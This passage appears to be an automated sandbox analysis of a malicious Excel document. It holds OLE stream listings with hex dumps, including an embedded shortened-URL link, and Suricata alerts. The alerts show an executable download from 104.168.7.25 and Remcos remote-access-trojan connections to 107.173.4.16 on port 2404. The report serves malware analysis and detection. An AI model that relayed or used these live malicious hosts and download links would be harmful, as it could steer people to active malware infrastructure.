CLSID:
File Type:	data
Stream Size:	20
Entropy:	0.5689955935892812
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0043CF7E/MBD0018D4CE/\x3ObjInfo, File Type: data, Stream Size: 4

General
Stream Path:	MBD0043CF7E/MBD0018D4CE/\x3ObjInfo
CLSID:
File Type:	data
Stream Size:	4
Entropy:	0.8112781244591328
Base64 Encoded:	False
Data ASCII:	. . . .
Data Raw:	00 00 03 00

Stream Path: MBD0043CF7E/MBD0018D4CE/Contents, File Type: Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c, Stream Size: 197671

General
Stream Path:	MBD0043CF7E/MBD0018D4CE/Contents
CLSID:
File Type:	Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
Stream Size:	197671
Entropy:	6.989042939766534
Base64 Encoded:	True
Data ASCII:	C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0043CF7E/MBD002A52B4/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD0043CF7E/MBD002A52B4/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.219515110876372
Base64 Encoded:	False
Data ASCII:	. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0043CF7E/MBD002A52B4/Package, File Type: Microsoft Excel 2007+, Stream Size: 50945

General
Stream Path:	MBD0043CF7E/MBD002A52B4/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	50945
Entropy:	7.631071730257267
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . E o . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 e3 45 b7 6f 8c 01 00 00 c0 05 00 00 13 00 ce 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 ca 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0043CF7E/MBD002A56E1/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD0043CF7E/MBD002A56E1/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.219515110876372
Base64 Encoded:	False
Data ASCII:	. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0043CF7E/MBD002A56E1/Package, File Type: Microsoft Excel 2007+, Stream Size: 31124

General
Stream Path:	MBD0043CF7E/MBD002A56E1/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	31124
Entropy:	7.746149934092623
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . . p @ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 13 70 40 80 a3 01 00 00 e2 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0043CF7E/MBD002A5E23/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD0043CF7E/MBD002A5E23/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0043CF7E/MBD002A5E23/\x5DocumentSummaryInformation, File Type: data, Stream Size: 484

General
Stream Path:	MBD0043CF7E/MBD002A5E23/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	484
Entropy:	3.922883556049869
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , D . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I N V . . . . . P L . . . . . D P L - 1 . . . . . I N V ! P r i n t _ A r e a . . . . . P L ! P r i n t _ A r e a . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 01 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00

Stream Path: MBD0043CF7E/MBD002A5E23/\x5SummaryInformation, File Type: data, Stream Size: 19956

General
Stream Path:	MBD0043CF7E/MBD002A5E23/\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	19956
Entropy:	3.056974324659501
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . M . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y d t . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . W P S O f f i c e . . @ . . . . E . w . @ . . . . . 2 . @ . . . . . _ . . . . . . . . . . G . . . . M . . . . . . . . ? . . . . . . . . . \| & . . . . . . . . . . . . . . & . . . " W M F C . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 4d 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 74 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00

Stream Path: MBD0043CF7E/MBD002A5E23/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 95624

General
Stream Path:	MBD0043CF7E/MBD002A5E23/Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	95624
Entropy:	3.889652332882722
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . Q \| 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: MBD0043CF7E/MBD002A6130/\x1CompObj, File Type: data, Stream Size: 94

General
Stream Path:	MBD0043CF7E/MBD002A6130/\x1CompObj
CLSID:
File Type:	data
Stream Size:	94
Entropy:	4.345966460061678
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0043CF7E/MBD002A6130/\x1Ole, File Type: data, Stream Size: 64

General
Stream Path:	MBD0043CF7E/MBD002A6130/\x1Ole
CLSID:
File Type:	data
Stream Size:	64
Entropy:	2.935667186688699
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . F e u i l 1 ! O b j e c t 1 8 4 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 46 65 75 69 6c 31 21 4f 62 6a 65 63 74 20 31 38 34 00

Stream Path: MBD0043CF7E/MBD002A6130/CONTENTS, File Type: PDF document, version 1.7, Stream Size: 21760

General
Stream Path:	MBD0043CF7E/MBD002A6130/CONTENTS
CLSID:
File Type:	PDF document, version 1.7
Stream Size:	21760
Entropy:	7.954015192696893
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 7 . % . 1 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 2 0 R . / A c r o F o r m 2 4 0 R . > > . e n d o b j . 8 0 o b j . < < . / L e n g t h 2 . > > . s t r e a m . . q . . . e n d s t r e a m . e n d o b j . 9 0 o b j . < < . / L e n g t h 2 . > > . s t r e a m . . q . . . e n d s t r e a m . e n d o b j . 1 0 0 o b j . < < . / L e n g t h 3 8 . / F i l t e r / F l a t e D e c o d e . > > . s t r e a m . . x + 2 7 2 3 7 U 0 . B . . s = # . 3
Data Raw:	25 50 44 46 2d 31 2e 37 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 32 34 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 38 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 32 0a 3e 3e 0a 73 74 72 65 61 6d 0d 0a 71 0a 0d 0a 65 6e 64 73 74 72 65 61 6d 0a 65

Stream Path: MBD0043CF7E/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 218908

General
Stream Path:	MBD0043CF7E/Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	218908
Entropy:	7.606771386739727
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: MBD0043CF7F/\x1Ole, File Type: data, Stream Size: 328

General
Stream Path:	MBD0043CF7F/\x1Ole
CLSID:
File Type:	data
Stream Size:	328
Entropy:	5.343575036749917
Base64 Encoded:	False
Data ASCII:	. . . . 0 . . W . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . s . h . u . v . i . . . i . o . / . 7 . a . l . 0 . e . Y . . . o . . ! + . ? . q . @ D z i y x . { . G U U 9 . ( = . . . A . * 3 U I r \\ T : G ' D ` ' . 9 . . . . . . . . . . . . . . . . b . . . p . P . n . 5 . w . w . H . f . 8 . J . U . v . p . 3 . 4 . s . 8 . M . y . H . x . 5 . A . V . M . k . l . T . K . i . g . b . t . 2 . L . A . X . 8 . M . E . v . C . p . g . x . 5 . v . 6 . . . T 2 C 2 . ) y . 4 . Z
Data Raw:	01 00 00 02 a9 30 13 7f 57 e3 8f 11 00 00 00 00 00 00 00 00 00 00 00 00 86 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 82 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 68 00 75 00 76 00 69 00 2e 00 69 00 6f 00 2f 00 37 00 61 00 6c 00 30 00 65 00 59 00 00 00 a3 b2 87 6f 05 06 bd 9f 21 2b 1b d6 f0 3f 82 15 cd 71 d6 8c ba 40 44 e0 9c c9 7a 69 79 f4 e9 78

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 339347

General
Stream Path:	Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	339347
Entropy:	7.998777703195241
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . / . 6 . . . . . . . D & 2 ^ L x " F L @ / J z d 6 ' [ . f 3 ` . . . . . . . ( p . . . \\ . p . V C u . 8 q w . } . 5 v . ( O . n . m 4 . ) ! . . . 0 x . ~ @ < X . b . @ x , T ! . . R X . . r d . . ! . # ! ] ] - L B . . . a . . . 8 3 . . . = . . . " C / . . . . . $ . 5 U A ^ L . . . . . . . . u . . . . " . . . . . 4 . . . . . . . h = . . . g r E . . h x . 1 ; @ . . . . . . . . % . " . . . } q . . . . ] . . . . . S . . . + 1 . . . 0 . m } . 9 c . 4 B x R 5 9 . 1 . . . ~ & 8
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 87 99 44 a5 26 32 c8 5e f0 e6 4c 8e 78 22 46 92 4c 40 a5 2f 4a 8a 7a ad fa f0 b8 b7 d6 64 ab b8 b1 b5 36 27 cd 5b fe e5 cb a1 a4 89 66 33 60 9d e1 00 02 00 b0 04 c1 00 02 00 28 70 e2 00 00 00 5c 00 70 00 ab 91 ff f7 b6 d2 56 43 75 0a 38 e5 71 98 96 d1 77 f3 c5 15 a8 7d 1f 35 76 17 28 8f 8c 4f

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	527
Entropy:	5.280980037440372
Base64 Encoded:	True
Data ASCII:	I D = " { F A 3 F 4 E C 7 - 9 3 8 D - 4 4 6 6 - A E B 0 - 5 F D 4 6 C 0 4 A E 1 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 1 A 3 8 1 C 7 8 5 C 7 8 5 C 7 8
Data Raw:	49 44 3d 22 7b 46 41 33 46 34 45 43 37 2d 39 33 38 44 2d 34 34 36 36 2d 41 45 42 30 2d 35 46 44 34 36 43 30 34 41 45 31 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:	data
Stream Size:	104
Entropy:	3.0488640812019017
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2644
Entropy:	3.9981836915909534
Base64 Encoded:	False
Data ASCII:	a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type:	data
Stream Size:	553
Entropy:	6.368849873685529
Base64 Encoded:	True
Data ASCII:	. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . z . . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
Data Raw:	01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 7a 05 1a 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-12T16:39:56.817090+0200	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	1	104.168.7.25	80	192.168.2.22	49170	TCP
2024-10-12T16:39:56.905812+0200	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	1	104.168.7.25	80	192.168.2.22	49170	TCP
2024-10-12T16:40:02.455454+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.22	49171	107.173.4.16	2404	TCP
2024-10-12T16:40:03.589923+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.22	49172	107.173.4.16	2404	TCP
2024-10-12T16:40:03.717468+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.22	49173	178.237.33.50	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2024 16:39:42.734498024 CEST	49161	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:42.734538078 CEST	443	49161	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:42.734878063 CEST	49161	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:42.740701914 CEST	49161	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:42.740715981 CEST	443	49161	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:43.218147993 CEST	443	49161	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:43.218585968 CEST	49161	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:43.223297119 CEST	49161	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:43.223304033 CEST	443	49161	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:43.223670006 CEST	443	49161	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:43.223809004 CEST	49161	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:43.306282997 CEST	49161	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:43.351413012 CEST	443	49161	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:43.488497972 CEST	443	49161	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:43.488720894 CEST	443	49161	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:43.488785028 CEST	49161	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:43.488869905 CEST	49161	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:43.490115881 CEST	49161	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:43.490124941 CEST	443	49161	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:43.506468058 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:43.511353970 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:43.511533976 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:43.511533976 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:43.516501904 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.018225908 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.018353939 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.018385887 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.018419027 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.018454075 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.018487930 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.018485069 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.018485069 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.018486023 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.018486023 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.018524885 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.018556118 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.018556118 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.018558025 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.018580914 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.018591881 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.018610001 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.018634081 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.018651009 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.018698931 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.023523092 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.023557901 CEST	80	49162	104.168.7.25	192.168.2.22
